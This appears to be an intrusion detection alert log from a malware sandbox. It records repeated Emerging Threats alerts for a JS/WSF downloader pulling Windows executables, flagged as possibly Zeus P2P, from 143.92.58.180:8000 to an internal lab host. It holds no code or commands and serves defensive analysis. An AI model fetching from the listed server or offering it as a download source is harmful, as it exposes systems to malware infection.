TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49172 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49172 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49172 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49172 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49172 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49332 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49369 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49332 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49369 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49332 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49369 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49332 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49369 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49332 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49369 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49332 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49369 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49332 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49369 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49218 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49218 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49218 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49218 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49218 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49218 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49218 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
